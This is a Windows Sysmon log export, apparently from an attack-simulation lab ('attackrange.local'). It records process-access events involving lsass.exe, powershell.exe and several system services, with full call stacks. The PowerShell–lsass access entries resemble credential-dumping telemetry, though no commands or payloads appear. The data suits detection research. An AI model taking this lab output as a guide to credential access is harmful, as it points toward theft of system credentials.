10341000x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.075{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000607Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.075{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000606Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:25.013{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_51rzyd2n.5l2.ps12020-11-03 15:50:25.013 10341000x8000000000000000605Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.997{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD2-5FA1-0E00-000000008701}10721960C:\Windows\system32\LogonUI.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7AD2-5FA1-0E00-000000008701}1072C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACC-5FA1-0900-000000008701}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+52338|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACC-5FA1-0900-000000008701}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:26.856{D28789B6-7AD1-5FA1-0C00-000000008701}5721328C:\Windows\system32\svchost.exe{D28789B6-7ACB-5FA1-0700-000000008701}716C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 